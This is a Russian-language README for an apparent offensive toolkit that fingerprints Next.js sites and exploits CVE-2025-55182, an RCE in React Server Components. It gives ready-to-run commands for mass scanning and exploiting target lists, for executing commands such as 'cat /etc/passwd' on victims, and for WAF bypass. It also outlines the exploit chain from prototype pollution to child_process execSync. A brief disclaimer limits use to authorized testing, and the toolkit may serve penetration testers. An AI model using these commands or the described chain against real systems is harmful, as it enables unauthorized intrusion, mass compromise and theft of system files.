
Автоматизированный набор инструментов для обнаружения и эксплуатации CVE-2025-55182, критической RCE в Next.js React Server Components. Включает многоуровневое снятие отпечатков, обход WAF и массовое сканирование для пентестинга.
Комплексный инструмент для исследований безопасности, предназначенный для тестирования уязвимости удалённого выполнения кода в React Server Components Next.js (CVE-2025-55182).
Этот набор инструментов предоставляет возможности автоматического обнаружения и эксплуатации уязвимости CVE-2025-55182 — критической RCE-уязвимости, затрагивающей приложения Next.js, использующие React Server Components. Набор состоит из трёх интегрированных компонентов:
requestspip3 install requests
git clone https://github.com/yourusername/CVE-2025-55182-poc-tool.git
cd CVE-2025-55182-poc-tool
chmod +x exploit.sh auto_exploit.sh
Самый быстрый способ сканировать и эксплуатировать цели:
# Создайте файл с URL-адресами целей (по одному на строку)
echo "https://example.com" > targets.txt
# Автоматическое сканирование и эксплуатация одной командой
./auto_exploit.sh -i targets.txt -s -c "id"
Определение приложений Next.js без эксплуатации:
python3 NextApp.py targets.txt
Выходные файлы:
confirmed_nextjs_targets.txt — все обнаруженные приложения Next.jshigh_confidence_nextjs_targets.txt — только обнаружения с высокой степенью уверенностиТестирование отдельных целей:
# Базовая эксплуатация
./exploit.sh -d https://target.com -c "whoami"
# С обходом WAF
./exploit.sh -d target.com -c "cat /etc/passwd" -w
# Настраиваемый размер обхода WAF
./exploit.sh -d target.com -c "ls -la" --waf-bypass --waf-size 256
# Пропустить проверку SSL
./exploit.sh -d https://target.com -c "id" -k
./auto_exploit.sh -i targets.txt -s -c "whoami"
# Шаг 1: Обнаружение приложений Next.js
python3 NextApp.py targets.txt
# Шаг 2: Эксплуатация подтверждённых целей
./auto_exploit.sh -c "id"
# Полное автосканирование с обходом WAF
./auto_exploit.sh -i targets.txt -s -w --waf-size 256 -c "whoami"
# Пользовательские задержки и таймауты
./auto_exploit.sh -i targets.txt -s --delay 5 --timeout 30 -c "id"
# Пропуск проверки SSL в массовом режиме
./auto_exploit.sh -i targets.txt -s -k -c "hostname"
python3 NextApp.py <targets_file>
Аргументы:
targets_file — текстовый файл с URL-адресами целей (по одному на строку)./exploit.sh [ПАРАМЕТРЫ]
Параметры:
./auto_exploit.sh [ПАРАМЕТРЫ]
Параметры:
Создаётся NextApp.py — содержит все URL-адреса, идентифицированные как приложения Next.js.
Создаётся NextApp.py — содержит только обнаружения Next.js с высокой степенью уверенности (оценка достоверности 100+).
Создаётся auto_exploit.sh — полный отчёт об эксплуатации, включая:
Сканер использует несколько методов обнаружения с системой оценки достоверности:
x-nextjs-*, x-vercel-*x-powered-by: Next.js__NEXT_DATA__ (100 баллов)_next/* (25–75 баллов в зависимости от количества)__NEXT_DATA__, __NEXT_LOADED_PAGES__middlewareManifest, self.__RSC_MANIFESTПороги достоверности:
Эксплойт использует цепочку загрязнения прототипа в React Server Components Next.js:
__proto__ через десериализацию JSON_response._prefixprocess.mainModule.require('child_process').execSync()X-Action-RedirectНабор инструментов включает встроенные возможности обхода WAF:
Включение с помощью флагов -w или --waf-bypass.
# Создание списка целей
cat > targets.txt << EOF
https://app.example.com
https://dashboard.example.com
https://admin.example.com
EOF
# Запуск единого сканирования
./auto_exploit.sh -i targets.txt -s -c "whoami"
# Просмотр результатов
cat exploit_results.txt
./exploit.sh -d https://target.com -c "cat /etc/passwd" -w --waf-size 256
# Шаг 1: обнаружение и фильтрация
python3 NextApp.py targets.txt
# Шаг 2: эксплуатация только целей с высокой достоверностью
./auto_exploit.sh -i high_confidence_nextjs_targets.txt -c "id"
Этот инструмент предназначен исключительно для авторизованного тестирования безопасности и исследовательских целей. Пользователи обязаны:
Несанкционированный доступ к компьютерным системам незаконен. Авторы не несут ответственности за неправильное использование этого инструмента.
Благодарим исследователей безопасности, обнаруживших и раскрывших эту уязвимость:
Приветствуются любые вклады! Пожалуйста:
По вопросам, проблемам или запросам функций, пожалуйста, создайте issue на GitHub.
Этот проект предоставляется для образовательных целей и авторизованного тестирования безопасности. Используйте ответственно и этично.
| Параметр | Описание | По умолчанию |
|---|
-d, --domain | Целевой домен/URL | http://localhost:3000 |
-f, --file | Файл со списком целей | - |
-c, --command | Команда для выполнения | id |
-w, --waf-bypass | Включить обход WAF | Отключено |
--waf-size SIZE | Размер данных для обхода WAF (КБ) | 128 |
--timeout SECONDS | Таймаут запроса | 15 |
-k, --insecure | Пропустить проверку SSL | Отключено |
--user-agent AGENT | Пользовательский User-Agent | Mozilla/5.0... |
-h, --help | Показать справку | - |
| Параметр | Описание | По умолчанию |
|---|
-i, --input FILE | Входной файл с целями | confirmed_nextjs_targets.txt |
-o, --output FILE | Выходной файл с результатами | exploit_results.txt |
-c, --command CMD | Команда для выполнения | id |
-w, --waf-bypass | Включить обход WAF | Отключено |
--waf-size SIZE | Размер обхода WAF (КБ) | 128 |
--timeout SECONDS | Таймаут запроса | 15 |
-k, --insecure | Пропустить проверку SSL | Отключено |
--delay SECONDS | Задержка между запросами | 2 |
-s, --scan | Автосканирование Next.js сначала | Отключено |
-h, --help | Показать справку | - |